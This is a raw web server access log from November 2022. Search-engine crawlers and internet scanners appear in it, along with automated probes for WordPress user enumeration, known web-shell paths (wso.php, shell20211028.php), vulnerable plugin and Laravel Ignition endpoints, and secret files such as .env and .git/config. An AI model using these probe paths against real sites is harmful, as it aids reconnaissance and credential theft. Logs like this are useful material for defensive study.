192.185.129.218 - - [11/Nov/2022:13:20:01 +0100] "GET /?author=91 HTTP/1.1" 301 494 "-" "Mozilla/5.0 (Linux; Android 10; LM-X420) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36"
198.71.240.37 - - [11/Nov/2022:13:20:14 +0100] "GET /?author=71 HTTP/1.1" 301 494 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"
178.254.10.124 - - [11/Nov/2022:13:20:28 +0100] "GET /?author=121 HTTP/1.1" 301 496 "-" "Mozilla/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/91.0.4472.80 Mobile/15E148 Safari/604.1"
216.244.66.196 - - [11/Nov/2022:15:31:31 +0100] "GET /robots.txt HTTP/1.1" 301 475 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.196 - - [11/Nov/2022:22:20:06 +0100] "GET /robots.txt HTTP/1.1" 301 475 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.196 - - [12/Nov/2022:05:33:47 +0100] "GET /robots.txt HTTP/1.1" 301 475 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
205.210.31.52 - - [12/Nov/2022:07:03:14 +0100] "GET / HTTP/1.1" 301 455 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
216.244.66.196 - - [12/Nov/2022:16:28:21 +0100] "GET /robots.txt HTTP/1.1" 301 475 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
5.75.164.241 - - [12/Nov/2022:18:45:22 +0100] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 301 579 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
5.75.164.241 - - [12/Nov/2022:18:45:36 +0100] "GET /wp-content/wso.php HTTP/1.1" 301 547 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
216.244.66.196 - - [13/Nov/2022:01:19:23 +0100] "GET /robots.txt HTTP/1.1" 301 475 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.196 - - [13/Nov/2022:05:02:04 +0100] "GET /robots.txt HTTP/1.1" 301 475 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
194.169.175.22 - - [13/Nov/2022:16:12:51 +0100] "GET /wp-admin/css/ HTTP/1.1" 301 537 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
183.91.15.246 - - [13/Nov/2022:17:33:51 +0100] "GET /style.php?sig=rename HTTP/1.1" 301 495 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 YaBrowser/20.9.3.136 Yowser/2.5 Safari/537.36"
198.235.24.159 - - [13/Nov/2022:20:12:48 +0100] "GET / HTTP/1.1" 301 455 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
34.254.95.133 - - [13/Nov/2022:22:52:13 +0100] "GET /robots.txt HTTP/1.1" 301 494 "-" "webprosbot/2.0 (+mailto:abuse-6337@webpros.com)"
35.217.14.240 - - [14/Nov/2022:04:54:51 +0100] "GET / HTTP/1.1" 301 474 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 25b8b31afb) Chrome/84.0.4147.105 Safari/537.36"
35.217.14.240 - - [14/Nov/2022:04:54:59 +0100] "GET / HTTP/1.1" 301 474 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 25b8b31afb) Chrome/84.0.4147.105 Safari/537.36"
35.217.14.240 - - [14/Nov/2022:04:55:01 +0100] "GET /robots.txt HTTP/1.1" 301 494 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 25b8b31afb) Chrome/84.0.4147.105 Safari/537.36"
35.217.14.240 - - [14/Nov/2022:04:55:30 +0100] "GET /app-ads.txt HTTP/1.1" 301 496 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 25b8b31afb) Chrome/84.0.4147.105 Safari/537.36"
35.217.14.240 - - [14/Nov/2022:04:55:30 +0100] "GET /ads.txt HTTP/1.1" 301 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 25b8b31afb) Chrome/84.0.4147.105 Safari/537.36"
35.217.14.240 - - [14/Nov/2022:04:55:33 +0100] "GET /wp-content/plugins/woocommerce/readme.txt HTTP/1.1" 301 556 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 25b8b31afb) Chrome/84.0.4147.105 Safari/537.36"
35.217.14.240 - - [14/Nov/2022:04:55:33 +0100] "GET /shop/ HTTP/1.1" 301 484 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 25b8b31afb) Chrome/84.0.4147.105 Safari/537.36"
35.217.14.240 - - [14/Nov/2022:04:55:33 +0100] "GET /checkout/ HTTP/1.1" 301 492 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 25b8b31afb) Chrome/84.0.4147.105 Safari/537.36"
35.212.145.229 - - [14/Nov/2022:04:56:06 +0100] "GET / HTTP/1.1" 301 474 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 25b8b31afb) Chrome/84.0.4147.105 Safari/537.36"
35.212.145.229 - - [14/Nov/2022:04:56:55 +0100] "GET / HTTP/1.1" 301 474 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 25b8b31afb) Chrome/84.0.4147.105 Safari/537.36"
35.212.145.229 - - [14/Nov/2022:04:56:56 +0100] "GET /robots.txt HTTP/1.1" 301 494 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 25b8b31afb) Chrome/84.0.4147.105 Safari/537.36"
35.212.145.229 - - [14/Nov/2022:04:57:26 +0100] "GET /ads.txt HTTP/1.1" 301 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 25b8b31afb) Chrome/84.0.4147.105 Safari/537.36"
35.212.145.229 - - [14/Nov/2022:04:57:26 +0100] "GET /app-ads.txt HTTP/1.1" 301 496 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 25b8b31afb) Chrome/84.0.4147.105 Safari/537.36"
35.212.145.229 - - [14/Nov/2022:04:57:29 +0100] "GET /shop/ HTTP/1.1" 301 484 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 25b8b31afb) Chrome/84.0.4147.105 Safari/537.36"
35.212.145.229 - - [14/Nov/2022:04:57:29 +0100] "GET /checkout/ HTTP/1.1" 301 492 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 25b8b31afb) Chrome/84.0.4147.105 Safari/537.36"
35.212.145.229 - - [14/Nov/2022:04:57:29 +0100] "GET /wp-content/plugins/woocommerce/readme.txt HTTP/1.1" 301 556 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 25b8b31afb) Chrome/84.0.4147.105 Safari/537.36"
147.78.47.249 - - [14/Nov/2022:05:01:26 +0100] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 301 528 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
147.78.47.249 - - [14/Nov/2022:05:01:29 +0100] "GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 301 602 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
147.78.47.249 - - [14/Nov/2022:05:01:31 +0100] "GET /public/_ignition/health-check/ HTTP/1.1" 301 534 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
147.78.47.249 - - [14/Nov/2022:05:01:33 +0100] "GET /_ignition/health-check/ HTTP/1.1" 301 520 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
109.195.148.73 - - [14/Nov/2022:13:31:54 +0100] "GET /admin.php?f=/bmLUxZLeaiRIek7s/umvUsXN4HVg3BzRf.txt HTTP/1.1" 301 555 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36"
109.195.148.73 - - [14/Nov/2022:13:31:54 +0100] "GET /3index.php?f=/bmLUxZLeaiRIek7s/umvUsXN4HVg3BzRf.txt HTTP/1.1" 301 557 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
109.195.148.73 - - [14/Nov/2022:13:31:54 +0100] "GET /class-wp-widget-archives.php HTTP/1.1" 301 511 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
109.195.148.73 - - [14/Nov/2022:13:31:54 +0100] "GET /wikindex.php?f=/bmLUxZLeaiRIek7s/umvUsXN4HVg3BzRf.txt HTTP/1.1" 301 561 "-" "Mozilla/5.0 (iPad; CPU OS 12_4_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1"
109.195.148.73 - - [14/Nov/2022:13:31:54 +0100] "GET /wp-content/mu-plugins-old/index.php?f=/bmLUxZLeaiRIek7s/umvUsXN4HVg3BzRf.txt HTTP/1.1" 301 607 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
216.244.66.196 - - [14/Nov/2022:15:15:12 +0100] "GET /robots.txt HTTP/1.1" 301 475 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
136.243.228.194 - - [15/Nov/2022:02:13:37 +0100] "GET /robots.txt HTTP/1.1" 301 494 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
80.76.51.29 - - [15/Nov/2022:03:04:56 +0100] "GET /wp-admin/css/ HTTP/1.1" 301 537 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
40.77.167.97 - - [15/Nov/2022:07:25:09 +0100] "GET /robots.txt HTTP/1.1" 301 531 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.177 - - [15/Nov/2022:07:26:19 +0100] "GET / HTTP/1.1" 301 511 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
65.154.226.169 - - [15/Nov/2022:08:06:10 +0100] "GET / HTTP/1.1" 301 455 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.244.66.196 - - [15/Nov/2022:10:26:18 +0100] "GET /robots.txt HTTP/1.1" 301 475 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
162.142.125.212 - - [15/Nov/2022:14:11:07 +0100] "GET / HTTP/1.1" 301 455 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
205.210.31.174 - - [15/Nov/2022:15:17:01 +0100] "GET / HTTP/1.1" 301 455 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
80.76.51.29 - - [15/Nov/2022:17:04:06 +0100] "GET /wp-admin/css/ HTTP/1.1" 301 537 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
216.244.66.196 - - [15/Nov/2022:21:03:49 +0100] "GET /robots.txt HTTP/1.1" 301 475 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
207.46.13.177 - - [16/Nov/2022:07:52:40 +0100] "GET / HTTP/1.1" 301 511 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
207.46.13.177 - - [16/Nov/2022:23:06:36 +0100] "GET / HTTP/1.1" 301 511 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
185.246.220.72 - - [17/Nov/2022:03:11:04 +0100] "GET /.env HTTP/1.1" 301 519 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.246.220.72 - - [17/Nov/2022:03:11:05 +0100] "POST / HTTP/1.1" 301 511 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
40.77.167.97 - - [17/Nov/2022:08:29:22 +0100] "GET /robots.txt HTTP/1.1" 301 531 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
207.46.13.177 - - [17/Nov/2022:08:29:31 +0100] "GET / HTTP/1.1" 301 511 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
20.191.45.212 - - [17/Nov/2022:21:43:14 +0100] "GET / HTTP/1.1" 301 511 "http://experiencias.asadorcasatomas.com/" "Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)"
216.244.66.196 - - [18/Nov/2022:18:28:47 +0100] "GET /robots.txt HTTP/1.1" 301 475 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.196 - - [18/Nov/2022:19:21:54 +0100] "GET /robots.txt HTTP/1.1" 301 475 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
147.78.47.249 - - [19/Nov/2022:04:34:57 +0100] "GET /_ignition/health-check/ HTTP/1.1" 301 520 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
147.78.47.249 - - [19/Nov/2022:04:35:02 +0100] "GET /public/_ignition/health-check/ HTTP/1.1" 301 534 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
147.78.47.249 - - [19/Nov/2022:04:35:05 +0100] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 301 528 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
147.78.47.249 - - [19/Nov/2022:04:35:08 +0100] "GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 301 602 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
147.78.47.249 - - [19/Nov/2022:04:35:10 +0100] "GET /wp-json/wp/v2/users/ HTTP/1.1" 301 514 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
34.243.255.227 - - [19/Nov/2022:07:38:59 +0100] "GET /robots.txt HTTP/1.1" 301 494 "-" "webprosbot/2.0 (+mailto:abuse-6337@webpros.com)"
212.227.216.239 - - [19/Nov/2022:14:32:03 +0100] "GET /robots.txt HTTP/1.1" 301 531 "-" "IonCrawl (https://www.ionos.de/terms-gtc/faq-crawler-en/)"
212.227.216.199 - - [19/Nov/2022:14:35:06 +0100] "GET / HTTP/1.1" 301 511 "-" "IonCrawl (https://www.ionos.de/terms-gtc/faq-crawler-en/)"
212.227.216.199 - - [19/Nov/2022:14:35:08 +0100] "GET /wp-admin/admin-ajax.php HTTP/1.1" 301 556 "-" "IonCrawl (https://www.ionos.de/terms-gtc/faq-crawler-en/)"
205.210.31.51 - - [20/Nov/2022:07:02:28 +0100] "GET / HTTP/1.1" 301 455 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
216.244.66.196 - - [20/Nov/2022:07:29:28 +0100] "GET /robots.txt HTTP/1.1" 301 475 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.196 - - [20/Nov/2022:10:31:08 +0100] "GET /robots.txt HTTP/1.1" 301 475 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
40.77.167.97 - - [20/Nov/2022:15:17:15 +0100] "GET /robots.txt HTTP/1.1" 301 531 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
207.46.13.177 - - [20/Nov/2022:15:18:02 +0100] "GET / HTTP/1.1" 301 511 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
20.25.226.161 - - [20/Nov/2022:15:54:19 +0100] "GET / HTTP/1.1" 301 511 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
20.25.226.161 - - [20/Nov/2022:21:53:51 +0100] "GET / HTTP/1.1" 301 511 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
20.25.226.161 - - [20/Nov/2022:23:09:05 +0100] "GET /.git/config HTTP/1.1" 301 533 "-" "python-requests/2.28.1"
20.25.226.161 - - [20/Nov/2022:23:09:05 +0100] "GET /.env.old HTTP/1.1" 301 527 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
20.25.226.161 - - [20/Nov/2022:23:09:06 +0100] "POST /.env.old HTTP/1.1" 301 527 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
20.25.226.161 - - [20/Nov/2022:23:09:07 +0100] "GET /core/.env HTTP/1.1" 301 529 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
20.25.226.161 - - [20/Nov/2022:23:09:07 +0100] "POST /core/.env HTTP/1.1" 301 529 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
20.25.226.161 - - [20/Nov/2022:23:09:09 +0100] "GET /laravel/.env HTTP/1.1" 301 535 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
20.25.226.161 - - [20/Nov/2022:23:09:09 +0100] "POST /laravel/.env HTTP/1.1" 301 535 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
20.25.226.161 - - [20/Nov/2022:23:09:12 +0100] "GET /frontend_dev.php/$ HTTP/1.1" 301 547 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
20.25.226.161 - - [20/Nov/2022:23:09:13 +0100] "GET /debug/default/view?panel=config HTTP/1.1" 301 573 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
20.25.226.161 - - [20/Nov/2022:23:09:16 +0100] "GET /config.json HTTP/1.1" 301 533 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
20.25.226.161 - - [20/Nov/2022:23:09:29 +0100] "GET /.json HTTP/1.1" 301 521 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
20.25.226.161 - - [20/Nov/2022:23:09:31 +0100] "GET /phpinfo.php HTTP/1.1" 301 533 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
20.25.226.161 - - [20/Nov/2022:23:09:38 +0100] "GET /?phpinfo=1 HTTP/1.1" 301 531 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
20.25.226.161 - - [20/Nov/2022:23:09:39 +0100] "GET /info.php HTTP/1.1" 301 527 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
20.25.226.161 - - [20/Nov/2022:23:09:42 +0100] "GET /_profiler/phpinfo HTTP/1.1" 301 545 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
173.236.137.153 - - [21/Nov/2022:00:33:41 +0100] "GET /wp-login.php HTTP/1.1" 301 498 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96"
173.236.137.153 - - [21/Nov/2022:00:33:44 +0100] "GET ///?author=1 HTTP/1.1" 301 492 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96"
173.236.137.153 - - [21/Nov/2022:00:33:46 +0100] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 514 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96"
207.46.13.177 - - [21/Nov/2022:04:11:44 +0100] "GET / HTTP/1.1" 301 511 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
162.142.125.210 - - [21/Nov/2022:14:16:16 +0100] "GET / HTTP/1.1" 301 455 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
20.25.226.161 - - [21/Nov/2022:15:00:30 +0100] "GET / HTTP/1.1" 301 511 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
172.173.237.71 - - [21/Nov/2022:18:58:35 +0100] "GET / HTTP/1.1" 301 455 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
207.46.13.177 - - [22/Nov/2022:04:49:15 +0100] "GET / HTTP/1.1" 301 511 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
5.161.153.137 - - [22/Nov/2022:22:46:50 +0100] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 301 579 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
5.161.153.137 - - [22/Nov/2022:22:47:01 +0100] "GET /wp-includes/wp-class.php HTTP/1.1" 301 559 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
5.161.153.137 - - [22/Nov/2022:22:47:19 +0100] "GET /wp-admin/shell20211028.php HTTP/1.1" 301 563 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
205.210.31.41 - - [23/Nov/2022:00:55:40 +0100] "GET / HTTP/1.1" 301 455 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
40.77.167.97 - - [23/Nov/2022:05:17:32 +0100] "GET /robots.txt HTTP/1.1" 301 531 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.177 - - [23/Nov/2022:05:17:37 +0100] "GET / HTTP/1.1" 301 511 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
142.44.135.134 - - [23/Nov/2022:07:09:30 +0100] "GET /wp-login.php HTTP/1.1" 301 498 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96"
142.44.135.134 - - [23/Nov/2022:07:09:33 +0100] "GET ///?author=1 HTTP/1.1" 301 492 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96"
142.44.135.134 - - [23/Nov/2022:07:09:34 +0100] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 514 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96"
183.136.225.46 - - [23/Nov/2022:14:43:58 +0100] "GET / HTTP/1.1" 301 511 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
183.136.225.46 - - [23/Nov/2022:14:44:19 +0100] "GET /robots.txt HTTP/1.1" 301 494 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
167.248.133.118 - - [23/Nov/2022:16:04:12 +0100] "GET / HTTP/1.1" 301 455 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
5.161.153.137 - - [23/Nov/2022:21:42:25 +0100] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 301 579 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
5.161.153.137 - - [23/Nov/2022:21:43:03 +0100] "GET /wp-includes/wp-class.php HTTP/1.1" 301 559 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
